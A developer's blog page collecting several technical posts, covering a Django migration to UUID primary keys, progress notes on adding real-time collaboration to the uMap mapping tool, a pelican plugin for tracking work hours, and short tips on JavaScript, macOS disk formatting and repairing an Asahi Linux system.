Alexis Métaireau - code

Changing the primary key of a model in Django

2024-02-22T00:00:00+01:00

I had to change the primary key of a django model, and I wanted to create a migration for this.

The previous model was using Django’s automatic primary key field.

I first changed the model to include the new uuid field, and declared the id field (the old primary key) explicitly, like this:

    uuid = models.UUIDField(
        unique=True, primary_key=True, default=uuid.uuid4, editable=False
    )
    id = models.IntegerField(null=True, blank=True)

Then I created the migration. It:

Adds a new uuid field/column in the database
Iterates over the existing items in the table, and generates a UUID for each of them
Changes the old primary key to a different type
Drops the old index
Marks the new uuid as the primary key.

To generate the migration, I ran django-admin makemigrations and iterated on the result. Here is the migration I ended up with:

import uuid

from django.db import migrations, models

class Migration(migrations.Migration):
    dependencies = [
        ("umap", "0017_migrate_to_openstreetmap_oauth2"),
    ]

    operations = [
        # Add the new uuid field
        migrations.AddField(
            model_name="datalayer",
            name="uuid",
            field=models.UUIDField(
                default=uuid.uuid4, editable=False, null=True, serialize=False
            ),
        ),
        # Generate UUIDs for existing records
        migrations.RunSQL("UPDATE umap_datalayer SET uuid = gen_random_uuid()"),
        # Remove the primary key constraint
        migrations.RunSQL("ALTER TABLE umap_datalayer DROP CONSTRAINT umap_datalayer_pk"),
        # Drop the "id" primary key…
        migrations.AlterField(
            "datalayer", name="id", field=models.IntegerField(null=True, blank=True)
        ),
        # … to put it back on the "uuid"
        migrations.AlterField(
            model_name="datalayer",
            name="uuid",
            field=models.UUIDField(
                default=uuid.uuid4,
                editable=False,
                unique=True,
                primary_key=True,
                serialize=False,
            ),
        ),
    ]

Generating UUIDs in pure python

The uuid generation can also be done with pure python, like this. It works with all databases, but might be slower. Use it with migrations.RunPython().

def gen_uuid(apps, schema_editor):
    DataLayer = apps.get_model("umap", "DataLayer")
    for row in DataLayer.objects.all():
        row.uuid = uuid.uuid4()
        row.save(update_fields=["uuid"])
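
The column is added as nullable first and filled afterwards because every existing row needs its own value: as far as I know, Django evaluates a callable default only once when adding a field, so all existing rows would otherwise share the same UUID. As a rough illustration outside of Django, here is a minimal sketch of the same backfill using Python’s built-in sqlite3 module as a stand-in database. The table layout and the backfill_uuids helper are assumptions made for the example, not uMap code.

```python
import sqlite3
import uuid


def backfill_uuids(conn, table="datalayer"):
    """Give every row that has no uuid yet its own freshly generated one."""
    # The table name is interpolated directly: acceptable for a sketch only.
    rows = conn.execute(f"SELECT id FROM {table} WHERE uuid IS NULL").fetchall()
    for (row_id,) in rows:
        conn.execute(
            f"UPDATE {table} SET uuid = ? WHERE id = ?",
            (str(uuid.uuid4()), row_id),
        )
    conn.commit()
    return len(rows)


# Stand-in for the existing table, with its integer primary key
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE datalayer (id INTEGER PRIMARY KEY, name TEXT)")
conn.executemany("INSERT INTO datalayer (name) VALUES (?)", [("a",), ("b",), ("c",)])

# Step 1: add the new column, nullable for now
conn.execute("ALTER TABLE datalayer ADD COLUMN uuid TEXT")
# Step 2: fill it, one distinct value per row
updated = backfill_uuids(conn)
values = [value for (value,) in conn.execute("SELECT uuid FROM datalayer")]
```

Only once every row has a distinct value does it make sense to mark the column as unique and as the primary key.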

Getting the constraint name

One of the things that took me some time was finding a way to get the constraint name before removing it. I wanted to do this with the Django ORM, but I didn’t find how. So here is how to do it in plain SQL. This only works with PostgreSQL, though.

migrations.RunSQL("""
DO $$
BEGIN
    EXECUTE 'ALTER TABLE umap_datalayer DROP CONSTRAINT ' || (
        SELECT indexname
        FROM pg_indexes
        WHERE tablename = 'umap_datalayer' AND indexname LIKE '%pkey'
    );
END $$;
"""),

Using uuids in URLs in a Django app

2024-02-22T00:00:00+01:00

After adding a regexp for uuids (which are quite hard to regexp for), I discovered that Django offers path converters, making this a piece of cake.

I was using old school re_path paths in my urls.py, but it’s possible to replace them with path, like this:

urlpatterns = (
    path(
        "datalayer/<int:map_id>/<uuid:pk>/",
        views.DataLayerView.as_view(),
        name="datalayer_view",
    ),
)

A few default path converters are defined (str, int, slug, uuid, path), but it’s also possible to define your own, as specified in the docs.
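
To give an idea of what a converter is, here is a minimal sketch of a class following the converter protocol (a regex attribute plus to_python and to_url methods). It mirrors what I understand the built-in uuid converter to do, but it is written from memory and only uses the standard library; the class name and the match_segment helper are made up for the example. In a real project the class would be registered with django.urls.register_converter.

```python
import re
import uuid


class UUIDConverterSketch:
    """Hypothetical converter, modelled on the path converter protocol."""

    # Lower-case hexadecimal UUID with dashes
    regex = "[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}"

    def to_python(self, value):
        # Called with the matched URL segment, returns what the view receives
        return uuid.UUID(value)

    def to_url(self, value):
        # Called when reversing a URL, returns the segment to put in the path
        return str(value)


def match_segment(converter, segment):
    """Illustrative helper: convert the segment if it matches, else None."""
    if re.fullmatch(converter.regex, segment) is None:
        return None
    return converter.to_python(segment)


converter = UUIDConverterSketch()
pk = match_segment(converter, "12345678-1234-5678-1234-567812345678")
not_a_uuid = match_segment(converter, "42")
```

With this in place, the view gets a uuid.UUID instance rather than a string, and a segment that doesn’t look like a UUID simply doesn’t match the route.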

Adding collaboration on uMap, third update

2024-02-12T00:00:00+01:00

I’ve spent the last few weeks working on uMap, still with the goal of bringing real-time collaboration to the maps. I’m not there yet, but I’ve made some progress that I will relate here.

JavaScript modules

uMap has been around since 2012, at a time when ES6 wasn’t out there yet.

At that time, it wasn’t possible to use JavaScript modules, nor modern JavaScript syntax. The project stayed with these requirements for a long time, in order to support people with old browsers. But as time goes on, we now have access to more browser features, and it’s now possible to use modules!

The team has been working hard on bringing modules to the mix. It wasn’t a piece of cake, but the result is here: we’re now able to use modern JavaScript modules and we are now more confident about which features of the browser we can use or not.

I then spent some time trying to integrate existing CRDTs like Automerge and YJS in our project. These two libs are unfortunately expecting us to use a bundler, which we aren’t currently.

uMap is plain old JavaScript, and as such is not using react or any other framework. The way I see this is that it makes it possible to have something “close to the metal” (if that means anything when it comes to web development).

As a result, we’re not tied to the development pace of these frameworks, and have more control on what we do (read “it’s easier to debug”).

So, after making tweaks and learning how “modules”, “requires” and “bundling” are working, I ultimately decided to take a break from this path, to work on the wiring with uMap. After all, CRDTs might not even be the way forward for us.

Internals

After some time with my head under water, I’m now able to better understand the big picture, and I’m not getting lost in the details like I was at first.

Let me try to summarize what I’ve learned.

uMap appears to be doing a lot of different things, but in the end it’s:

Using Leaflet.js to render features on the map;
Using Leaflet Editable to edit complex shapes, like polylines, polygons, and to draw markers;
Using the Formbuilder to expose a way for the users to edit the features, and the data of the map;
Serializing the layers to and from GeoJSON. That’s what’s being sent to and received from the server;
Providing different layer types (marker cluster, choropleth, etc.) to display the data in different ways.

Naming matters

There is some naming overlap between the different projects we’re using, and it’s important to have these small clarifications in mind:

Leaflet layers and uMap features

In Leaflet, everything is a layer. What we call features in GeoJSON are Leaflet layers, and even a (uMap) layer is a layer. We need to be extra careful about what our inputs and outputs are in this context.

We actually have different layer concepts: the datalayer and the different kinds of layers (choropleth, marker cluster, etc.). A datalayer is (as you can guess) where the data is stored. It’s what uMap serializes. It contains the features (with their properties). But that’s the trick: these features are named layers by Leaflet.

GeoJSON and Leaflet

We’re using GeoJSON to share data with the server, but we’re using Leaflet internally. And these two have different ways of naming things.

The different geometries are named differently (a Leaflet Marker is a GeoJSON Point), and their coordinates are stored differently: Leaflet stores lat, long where GeoJSON stores long, lat. Not a big deal, but it’s a good thing to know.

Leaflet stores data in options, where GeoJSON stores it in properties.
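
To make the difference concrete, here is a small Python sketch of the conversion in both directions for a single marker. The function names are made up for the example; in uMap itself this is handled in JavaScript by Leaflet.

```python
def latlng_to_geojson_point(lat, lng, options=None):
    """Build a GeoJSON Point feature from Leaflet-style (lat, lng) values."""
    return {
        "type": "Feature",
        # GeoJSON wants [longitude, latitude], the reverse of Leaflet
        "geometry": {"type": "Point", "coordinates": [lng, lat]},
        # What Leaflet keeps in "options" travels as GeoJSON "properties"
        "properties": dict(options or {}),
    }


def geojson_point_to_latlng(feature):
    """Return the (lat, lng) pair Leaflet expects for a GeoJSON Point."""
    lng, lat = feature["geometry"]["coordinates"][:2]
    return lat, lng


# Rennes is roughly at latitude 48.11, longitude -1.68
feature = latlng_to_geojson_point(48.11, -1.68, {"name": "Rennes"})
latlng = geojson_point_to_latlng(feature)
```

Swapping the two values by mistake does not raise any error, the marker just ends up somewhere else on the globe, which is why it’s worth keeping the conversion in one place.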

This is not reactive programming

I was expecting the frontend to be organised similarly to Elm apps (or React apps): a global state and a data flow (a la redux), with events changing the data that will trigger a rerendering of the interface.

Things work differently for us: different components can write to the map, and get updated without being centralized. It’s just a different paradigm.

A syncing proof of concept

With that in mind, I started thinking about a simple way to implement syncing.

I left aside all the thinking about how this would relate to CRDTs. It can be useful, but later. For now, I “just” want to synchronize two maps. I want a proof of concept to make informed decisions.

Syncing map properties

I started syncing map properties. Things like the name of the map, the default color and type of the marker, the description, the default zoom level, etc.

All of these are handled by “the formbuilder”. You pass it an object, a list of properties and a callback to call when an update happens, and it will build form inputs for you.

Taken from the documentation (and simplified):

var tilelayerFields = [
    ['name', {handler: 'BlurInput', placeholder: 'display name'}],
    ['maxZoom', {handler: 'BlurIntInput', placeholder: 'max zoom'}],
    ['minZoom', {handler: 'BlurIntInput', placeholder: 'min zoom'}],
    ['attribution', {handler: 'BlurInput', placeholder: 'attribution'}],
    ['tms', {handler: 'CheckBox', helpText: 'TMS format'}]
];
var builder = new L.FormBuilder(myObject, tilelayerFields, {
    callback: myCallback,
    callbackContext: this
});

In uMap, the formbuilder is used for every form you see on the right panel. Map properties are stored in the map object.

We want two different clients to work together. When one changes the value of a property, the other client needs to be updated, and update its interface.

I’ve started by creating a mapping of property names to rerender-methods, and added a method renderProperties(properties) which updates the interface, depending on the properties passed to it.

We now have two important things:

Some code getting called each time a property is changed ;
A way to refresh the right interface when a property is changed.

In other words, from one client we can send the message to the other client, which will be able to rerender itself.

Looks like a plan.
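
The mapping idea can be sketched in a few lines. The real code is JavaScript inside uMap; this is a Python stand-in where the class, the property names and the render methods are all hypothetical, just to show how several properties can share a render method that is then called only once.

```python
class MapSketch:
    """Hypothetical stand-in for the uMap map object."""

    # Which render method refreshes the interface for each property
    RENDERERS = {
        "name": "render_caption",
        "description": "render_caption",
        "zoom": "render_view",
    }

    def __init__(self):
        self.properties = {}
        self.calls = []  # records which render methods ran, for the demo

    def render_caption(self):
        self.calls.append("caption")

    def render_view(self):
        self.calls.append("view")

    def render_properties(self, names):
        """Call each needed render method once, in first-seen order."""
        methods = []
        for name in names:
            method = self.RENDERERS.get(name)
            if method and method not in methods:
                methods.append(method)
        for method in methods:
            getattr(self, method)()

    def update(self, name, value):
        """Change a property, then refresh the matching part of the UI."""
        self.properties[name] = value
        self.render_properties([name])


umap = MapSketch()
umap.render_properties(["name", "description", "zoom"])
```

Here name and description both refresh the caption, so the caption is rendered once even though two properties changed.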

Websockets

We need a way for the data to go from one side to the other. The easiest way is probably websockets.

Here is some simple code which will relay messages from one websocket to the other connected clients. It’s not the final code, it’s just for demo purposes.

A basic way to do this on the server side is to use python’s websockets library.

import asyncio
import websockets
from websockets.server import serve
import json

# Just relay all messages to other connected peers for now

CONNECTIONS = set()

async def join_and_listen(websocket):
    CONNECTIONS.add(websocket)
    try:
        async for message in websocket:
            # recompute the peers-list at the time of message-sending.
            # doing so beforehand would miss new connections
            peers = CONNECTIONS - {websocket}
            websockets.broadcast(peers, message)
    finally:
        CONNECTIONS.remove(websocket)


async def handler(websocket):
    message = await websocket.recv()
    event = json.loads(message)

    # The first event should always be 'join'
    assert event["kind"] == "join"
    await join_and_listen(websocket)

async def main():
    async with serve(handler, "localhost", 8001):
        await asyncio.Future()  # run forever

asyncio.run(main())

On the client side, it’s fairly easy as well. I won’t even cover it here.

We now have a way to send data from one client to the other. Let’s consider the actions we do as “verbs”. For now, we’re just updating properties values, so we just need the update verb.

Code architecture

We need different parts:

the transport, which connects to the websockets, sends and receives messages;
the message sender, which relays local messages to the other party;
the message receiver, which is called each time we receive a message;
the sync engine, which glues everything together;
different updaters, which know how to apply received messages, the goal being to update the interface in the end.

When receiving a message it will be routed to the correct updater, which will know what to do with it.

In our case, it’s fairly simple: when updating the name property, we send a message with name and value. We also need to send along some additional info: the subject.

In our case, it’s map because we’re updating map properties.

When initializing the map, we’re initializing the SyncEngine, like this:

// inside the map
let syncEngine = new umap.SyncEngine(this)

// Then, when we need to send data to the other party
let syncEngine = this.obj.getSyncEngine()
let subject = this.obj.getSyncSubject()

syncEngine.update(subject, field, value)

The code on the other side of the wire is simple enough: when you receive the message, change the data and rerender the properties:

this.updateObjectValue(this.map, key, value)
this.map.renderProperties(key)
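
Put together, the parts listed above could be wired as in the following sketch. It is written in Python rather than JavaScript, uses an in-memory transport instead of a websocket, and every class name and message field in it is an assumption made for the example, not the actual uMap code.

```python
import json


class FakeTransport:
    """In-memory stand-in for the websocket connection."""

    def __init__(self):
        self.deliver = None  # set to the remote engine's receive method

    def send(self, payload):
        self.deliver(payload)


class MapUpdater:
    """Knows how to apply a received update to the map properties."""

    def __init__(self, state):
        self.state = state

    def update(self, key, value):
        self.state[key] = value


class SyncEngine:
    def __init__(self, transport, state):
        self.transport = transport
        # One updater per subject; only "map" exists at this stage
        self.updaters = {"map": MapUpdater(state)}

    def update(self, subject, key, value):
        """Sender side: serialize the change and hand it to the transport."""
        message = {"kind": "update", "subject": subject, "key": key, "value": value}
        self.transport.send(json.dumps(message))

    def receive(self, payload):
        """Receiver side: route the message to the updater for its subject."""
        message = json.loads(payload)
        if message["kind"] != "update":
            raise ValueError(f"Unknown verb: {message['kind']}")
        self.updaters[message["subject"]].update(message["key"], message["value"])


alice_state, bob_state = {}, {}
alice_transport, bob_transport = FakeTransport(), FakeTransport()
alice = SyncEngine(alice_transport, alice_state)
bob = SyncEngine(bob_transport, bob_state)
alice_transport.deliver = bob.receive
bob_transport.deliver = alice.receive

alice.update("map", "name", "Cycling paths")
```

In this sketch the sender does not apply the change to its own state: locally, that is already done by the form that triggered the update.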

Syncing features

At this stage I was able to sync the properties of the map. A small victory, but not the end of the trip.

The next step was to add syncing for features: markers, polygon and polylines, alongside their properties.

All of these features have a uMap class representation (which extends Leaflet’s ones). All of them share some code in the FeatureMixin class.

That seems a good place to do the changes.

I did a few changes:

Each feature now has an identifier, so clients know they’re talking about the same thing. This identifier is also stored in the database when saved.
I’ve added an upsert verb, because we don’t have any way (from the interface) to make a distinction between the creation of a new feature and its modification. The way we intercept the creation of a feature (or its update) is to use Leaflet Editable’s editable:drawing:commit event. We just have to listen to it and then send the appropriate messages!

After some fiddling around (ah, everybody wants to create a new protocol!) I went with reusing GeoJSON. It allowed me to have a better understanding of how Leaflet is using latlngs. That’s a multi-dimensional array, with variable width, depending on the type of geometry and the number of shapes in each of these.

Clearly not something I want to redo, so I’m now reusing some Leaflet code, which handles this serialization for me.

I’m now able to sync different types of features with their properties.

Point properties are also editable, using the already-existing table editor. I was expecting this to require some work but it’s just working without more changes.

What’s next ?

I’m able to sync map properties, features and their properties, but I’m not yet syncing layers. That’s the next step! I also plan to make some pull requests with the interesting bits I’m sure will go in the final implementation:

Adding ids to features, so we have a way to refer to them.
Having a way to map properties with how they render the interface, the renderProperties bits.

Once this demo is working, I’ll probably spend some time updating it with the latest changes (uMap is moving a lot these weeks). I will probably focus on how to integrate websockets on the server side, and then will see how to leverage (maybe) some magic from CRDTs, if we need it.

See you for the next update!

Returning objects from an arrow function

2024-02-08T00:00:00+01:00

When using an arrow function in JavaScript, I was expecting to be able to return objects, but ended up with undefined values.

It turns out it’s not possible to return an object literal directly from a concise arrow function body, because the braces are parsed as a block of statements rather than as an object.

This is covered by MDN.

To return an object, I had to wrap it in parentheses, like this:

latlngs.map(({ lat, lng }) => ({ lat, lng }))

Format a USB disk from the command-line on MacOSX

2023-12-25T00:00:00+01:00

sudo diskutil unmountDisk /dev/disk5
sudo diskutil eraseDisk "MS-DOS FAT32" Brocolis /dev/disk5

Rescuing a broken asahi linux workstation

2023-12-08T00:00:00+01:00

On my main machine, I’m currently using Asahi Linux (on a macbook m1). I’ve recently broken my system, which wasn’t able to boot because of a broken /etc/fstab.

On my previous setups, I was able to easily plug in a USB key and boot from it to solve my issues, but here I wasn’t sure how to deal with it.

After playing a bit (without much luck) with qemu and vagrant, someone pointed me in the right direction: using Alpine Linux.

Here’s what I did to solve my broken install:

First, install this alpine linux on a key.

Download the iso image here, and copy it to a key. I’m not sure why, but dd didn’t work for me, and I ended up using another tool to create the usb from the iso.

# When booting, press a key to enter u-boot. Then:
env set boot_efi_bootmgr
run bootcmd_usb0

Which should get you a session. When connected, do the following:

# to find the partition you want to mount, marked EFI something
lsblk -f
mount LABEL="EFI - FEDOR" /mnt

# Install the wifi firmware
cd /lib/firmware
tar xvf /mnt/vendor/firmware.tar
/root/update-vendor-firmware
rm /etc/modprobe.d/blacklist-brcmfmac.conf
modprobe brcmfmac

# Connect to the wifi
/etc/init.d/iwd start
iwctl

In my case, I wanted to mount a btrfs filesystem to fix something inside.

apk add btrfs-progs
echo btrfs >> /etc/modules
modprobe btrfs
mount LABEL="fedora" /opt/fedora

I then could access the filesystem, and made a fix to it.

Resources:

https://arvanta.net/alpine/install-alpine-m1/
https://arvanta.net/alpine/iwd-howto/
https://wiki.alpinelinux.org/wiki/Btrfs

Using pelican to track my worked and volunteer hours

2023-11-23T00:00:00+01:00

I was tracking my hours in Datasette (article and follow-up), but I wasn’t really happy with the editing process.

I’ve seen David’s notes, which made me want to do something similar.

I’m recording everything in markdown files, so I was already keeping track of things this way. Tracking my hours should be simple, otherwise I might just overlook it. So I hacked something together with pelican (the software I wrote for this blog).

It’s doing the following:

Defines a specific format for my worklog entries;
Parses them (using a regexp) and does some computation;
Uses a specific template to display a graph and a progress bar.

Reading information from the titles

I actually took the format I had already been using in my log, and enhanced it a bit. Basically, the files look like this (I’m writing in French):

---
title: My project
total_days: 25
---

## Mardi 23 Novembre 2023 (9h, 5/5)

What I did this day.
I can include [links](https://domain.tld) and whatever I want.
It won't be processed.

## Lundi 22 Novembre 2023 (8h rémunérées, 2h bénévoles, 4/5)

Something else.

Basically, the second-level titles (h2) are parsed, and should have the following structure: {day_of_week} {day} {month} {year} ({worked_hours}(, optional {volunteer_hours}), {fun_rank})

The goal here is to retrieve all of this, so I asked ChatGPT for a regexp and iterated on the result which got me:

pattern = re.compile(
        r"""
        (\w+)\s+                      # Day name
        (\d{1,2})\s+                  # Day number
        ([\wéû]+)\s+                  # Month name
        (\d{4})\s+                    # Year
        \(
        (\d{1,2})h                    # Hours (mandatory)
        (?:\s+(?:facturées|rémunérées))? # Optionally 'facturées' or 'rémunérées'; if absent, hours are assumed to be paid
        (?:,\s*(\d{1,2})h\s*bénévoles)? # Optionally volunteer hours ('bénévoles')
        ,?                            # An optional comma
        \s*                           # Optional whitespace
        (?:fun\s+)?                   # Optionally 'fun' (text) followed by whitespace
        (\d)/5                        # Happiness rating (mandatory, always present)
        \)                            # Closing parenthesis
        """,
        re.VERBOSE | re.UNICODE,
    )

The markdown preprocessor

I’m already using a custom pelican plugin, which makes it possible to have pelican behave exactly the way I want. For instance, it’s getting the date from the filesystem.

I just had to add some features to it. The way I’m doing this is by using a custom Markdown reader, on which I add extensions and custom processors.

In my case, I added a preprocessor which will only run when we are handling the worklog. It makes it possible to change what’s being read, before the markdown lib actually transforms it to HTML.

Here is the code for it:

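import re
from datetime import datetime

from markdown.preprocessors import Preprocessor


class WorklogPreprocessor(Preprocessor):
    pattern = "the regexp we've seen earlier"

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # Parsed entries, keyed by ISO date
        self.data = {}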

    def run(self, lines):
        new_lines = []
        for line in lines:
            if line.startswith("##"):
                match = re.search(self.pattern, line)
                if not match:
                    raise ValueError("Unable to parse worklog title", line)
                (
                    day_of_week,
                    day,
                    month,
                    year,
                    payed_hours,
                    volunteer_hours,
                    happiness,
                ) = match.groups()

                volunteer_hours = int(volunteer_hours) if volunteer_hours else 0
                payed_hours = int(payed_hours)
                happiness = int(happiness)

                # %B matches month names in the current locale, so a French locale must be active here
                date = datetime.strptime(f"{day} {month} {year}", "%d %B %Y")
                self.data[date.strftime("%Y-%m-%d")] = {
                    "payed_hours": payed_hours,
                    "volunteer_hours": volunteer_hours,
                    "happyness": happiness,
                }

                # Replace the line with just the date
                new_lines.append(f"## 🗓️ {day_of_week} {day} {month} {year}")
            else:
                new_lines.append(line)
        return new_lines

It does the following when it encounters a h2 line:

try to parse it
store the data locally
replace the line with a simpler version
If it doesn’t work, error out.
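
One thing to be aware of: strptime’s %B directive depends on the process locale, so French month names only parse when a French locale is active. If that isn’t guaranteed, a lookup table does the job without touching the locale. This is a minimal sketch of that alternative, not the code I’m actually running; the FRENCH_MONTHS table and parse_french_date function are names made up for the example.

```python
from datetime import date

# French month names mapped to their number (lower-cased for lookup)
FRENCH_MONTHS = {
    "janvier": 1, "février": 2, "mars": 3, "avril": 4,
    "mai": 5, "juin": 6, "juillet": 7, "août": 8,
    "septembre": 9, "octobre": 10, "novembre": 11, "décembre": 12,
}


def parse_french_date(day, month, year):
    """Build a date from the strings captured in a worklog title."""
    try:
        month_number = FRENCH_MONTHS[month.lower()]
    except KeyError:
        raise ValueError(f"Unknown month name: {month!r}") from None
    return date(int(year), month_number, int(day))


entry_date = parse_french_date("23", "Novembre", "2023")
print(entry_date.isoformat())  # 2023-11-23
```

The result can be used as the dictionary key in the same way as the strftime("%Y-%m-%d") value in the preprocessor.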

I’ve also added some computations on top of it, which make it possible to display a percentage of completion for the project if “total_days” is present in the metadata (a day counting for 7 hours), and make the page use a specific template (see later).

def compute_data(self, metadata):
    done_hours = sum([item["payed_hours"] for item in self.data.values()])

    data = dict(
        data=self.data,
        done_hours=done_hours,
        template="worklog",
    )

    if "total_days" in metadata:
        total_hours = int(metadata["total_days"]) * 7
        data.update(
            dict(
                total_hours=total_hours,
                percentage=round(done_hours / total_hours * 100),
            )
        )

    return data

Plugging this with pelican

Here’s the code for extending a custom reader, basically adding a pre-processor and adding back its data in the document metadata:

is_worklog = Path(source_path).parent.match("pages/worklog")

if is_worklog:
    worklog = WorklogPreprocessor(self._md)
    self._md.preprocessors.register(worklog, "worklog", 20)

# process the markdown, and then

if is_worklog:
    metadata["worklog"] = worklog.compute_data(metadata)

Adding a graph

Okay, everything is parsed, but it’s not yet displayed on the pages. I’m using vega-lite to display a graph.

Here is my template for this (stored in template/worklog.html), it’s doing a stacked bar chart with my data.

const spec = {
      "$schema": "https://vega.github.io/schema/vega-lite/v5.json",
      "width": 500,
      "height": 200,
      "data": 
        {
          "name": "table",
          "values": [
          {% for date, item in page.metadata.worklog.data.items() %}
            {"date": "{{ date }}", "series": "Rémunéré", "count": {{ item['payed_hours'] }}},
            {"date": "{{ date }}", "series": "Bénévole", "count": {{ item['volunteer_hours'] }}},
          {% endfor %}
          ]
        }
      ,
      "mark": "bar",
      "encoding": {
        "x": {
          "timeUnit": {"unit": "dayofyear", "step": 1},
          "field": "date",
          "axis": {"format": "%d/%m"},
          "title": "Date",
          "step": 1,
        },
        "y": {
          "aggregate": "sum",
          "field": "count",
          "title": "Heures",
        },
        "color": {
          "field": "series",
          "scale": {
            "domain": ["Bénévole", "Rémunéré"],
            "range": ["#e7ba52", "#1f77b4"]
          },
          "title": "Type d'heures"
        }
      }
    };

    vegaEmbed("#vis", spec)
        // result.view provides access to the Vega View API
      .then(result => console.log(result))
      .catch(console.warn);

I’ve also added a small progress bar, made with unicode, which looks like this.

▓▓░░░░░░░░ 29% (51h / 175 prévues)

Here is the code for it:

{% if "total_days" in page.metadata.keys() %}
      {% set percentage = page.metadata.worklog['percentage'] %}
      {% set total_blocks = 10 %}
      {% set percentage_value = (percentage / 100.0) %}
      {% set full_blocks = ((percentage_value * total_blocks) | round(0, 'floor') ) | int %}
      {% set empty_blocks = total_blocks - full_blocks %}
      <div class="progressbar">
        {# Display full blocks #}
        {% for i in range(full_blocks) %}▓{% endfor %}
        {# Display empty blocks #}
        {% for i in range(empty_blocks) %}░{% endfor %}
        {{ percentage }}% ({{ page.metadata.worklog['done_hours'] }}h / {{ page.metadata.worklog['total_hours'] }} prévues)
      </div>
{% endif %}
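
For reference, the same arithmetic can be written in plain Python, which makes it easy to check against the example bar shown earlier (51 hours done out of 175 planned). This is only a sketch: the progress_bar function is made up for the example, and unlike the template it caps the bar at 10 blocks when the percentage goes over 100.

```python
def progress_bar(done_hours, total_hours, total_blocks=10):
    """Render a unicode progress bar like the one in the template."""
    percentage = round(done_hours / total_hours * 100)
    # Integer division floors, like round(0, 'floor') in the template.
    # Capping at total_blocks is an addition the template doesn't have.
    full_blocks = min(total_blocks, percentage * total_blocks // 100)
    empty_blocks = total_blocks - full_blocks
    bar = "▓" * full_blocks + "░" * empty_blocks
    return f"{bar} {percentage}% ({done_hours}h / {total_hours} prévues)"


print(progress_bar(51, 175))  # ▓▓░░░░░░░░ 29% (51h / 175 prévues)
```

Because the number of blocks is floored, 29% shows two full blocks, not three.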

Adding Real-Time Collaboration to uMap, second week

2023-11-21T00:00:00+01:00

I continued working on uMap, an open-source map-making tool to create and share customizable maps, based on OpenStreetMap data.

Here is a summary of what I did:

I reviewed, rebased and made some minor changes to a pull request which makes it possible to merge GeoJSON features together;
I’ve explored the idea of using SQLite inside the browser, for two reasons: it could make it possible to use the Spatialite extension, and it might help us implement a CRDT with cr-sqlite;
I learned a lot about the GIS field. This is a wide ecosystem with lots of moving parts, which I understand a bit better now.

The optimistic-merge approach

There was an open pull request implementing an “optimistic merge”. We spent some time together with Yohan to understand what the pull request is doing, discuss it and make a few changes.

Here’s the logic of the changes:

On the server side, we detect whether there is a conflict between the incoming changes and what’s stored on the server (is the last saved document fresher than the If-Unmodified-Since header we get?);
In case of conflict, retrieve the reference document from the history (let’s name this the “local reference”);
Merge the 3 documents together, that is:
Find what the incoming changes are, by comparing the incoming doc to the local reference.
Re-apply the changes on top of the latest doc.
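
The conflict check from the first step can be sketched with the standard library alone. This is an illustration of the comparison, not the code from the pull request; the has_conflict function and its arguments are assumptions made for the example.

```python
from datetime import datetime, timezone
from email.utils import format_datetime, parsedate_to_datetime


def has_conflict(last_saved: datetime, if_unmodified_since: str) -> bool:
    """True when the stored document is fresher than what the client last saw."""
    client_seen = parsedate_to_datetime(if_unmodified_since)
    # HTTP dates have a one-second resolution, so drop the microseconds
    return last_saved.replace(microsecond=0) > client_seen


# The client loaded the document at 10:00 and sends that date back on save
seen = datetime(2023, 11, 21, 10, 0, 0, tzinfo=timezone.utc)
header = format_datetime(seen, usegmt=True)

# Someone else saved at 10:05 in the meantime: that's a conflict
conflict = has_conflict(datetime(2023, 11, 21, 10, 5, tzinfo=timezone.utc), header)
# Nobody saved since: the incoming document can be stored as-is
no_conflict = has_conflict(seen, header)
```

Only when the check reports a conflict does the server need to look up the reference document and attempt the merge.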

One could compare this logic to what happens when you do a git rebase. Here is some pseudo-code:

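from copy import copy


class ConflictError(ValueError):
    """Raised when the same feature was changed on both sides."""


def get_difference(reference: list, incoming: list):
    """Return (items removed from reference, items added by incoming).

    Hypothetical helper: one possible implementation, for illustration.
    """
    removed = [item for item in reference if item not in incoming]
    added = [item for item in incoming if item not in reference]
    return removed, added


def merge_features(reference: list, latest: list, incoming: list):
    """Finds the changes between reference and incoming, and reapplies them on top of latest."""
    if latest == incoming:
        return latest

    reference_removed, incoming_added = get_difference(reference, incoming)

    # Ensure that items changed by the incoming doc weren't also changed in the latest.
    for removed in reference_removed:
        if removed not in latest:
            raise ConflictError

    merged = copy(latest)
    # Reapply the changes on top of the latest.
    for removed in reference_removed:
        merged.remove(removed)

    for added in incoming_added:
        merged.append(added)

    return merged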

The pull request is not ready yet, as I still want to add tests with real data, and enhance the naming, but that’s a step in the right direction :-)

Using SQLite in the browser

At the moment, (almost) everything is stored on the server side as GeoJSON files. They are simple to use, to read and to write, and having them on the storage makes it easy to handle multiple revisions.

I’ve been asked to challenge this idea for a moment. What if we were using some other technology to store the data? What would that give us? What would be the challenges?

I went with SQLite, just to see what this would mean.

SQLite was not originally made to work in a web browser, but thanks to WebAssembly, it’s possible to use it there. It’s not that big, but the library still weighs 2 MB;
With projects such as CR-SQLite, you get a way to add CRDTs on top of SQLite databases. Meaning that the clients could send their changes to other clients or to the server, and that it would be easy to integrate;
The clients could retrieve just some part of the data from the server (e.g. by specifying a bounding box), which makes it possible to avoid loading everything in memory when that’s not needed.

I wanted to see how it would work, and what would be the challenges around this technology. I wrote a small application with it. Turns out writing to a local in-browser SQLite works.

Here is what it would look like:

Each client will get a copy of the database, alongside a version ;
When clients send changes, you can just send the data since the last version ;
Databases can be merged without losing data: the operations done in SQL will trigger writes to a specific table, which will be used as a CRDT.

I’m not sure SQLite by itself is useful here. It sure is fun, but I don’t see what we get in comparison with a more classical CRDT approach, except complexity. The technology is still quite young and rough around the edges, and uses Rust and WebAssembly, which are still strange beasts to me.

Here are some interesting projects I’ve found this week :

Leaflet.offline allows storing the tiles offline;
geojson-vt uses the concept of “vector tiles”, which I didn’t know about. Tiles can return binary or vector data, which can be useful to get just the data in one specific bounding box. This allows us, for instance, to store GeoJSON in vector tiles;
mapbox-gl-js makes it possible to render GIS-related data using WebGL (no connection with Leaflet);
leaflet-ugeojson and leaflet.Sync allow multiple people to share the same view on a map.

Two libraries seem useful for us:

Leaflet-GeoSSE makes it possible to use SSE (Server Sent Events) to update local data. It uses events (create, update, delete) and keys in the GeoJSON features.
Leaflet Realtime does something a bit similar, but doesn’t take care of the transport. It’s meant to be used to track remote elements (a GPS tracker for instance)

I’m noting that:

In the two libraries, unique identifiers are added to the features to allow for updates.
None of these libraries makes it possible to track local changes. That’s what’s left to find.

How to transport the data?

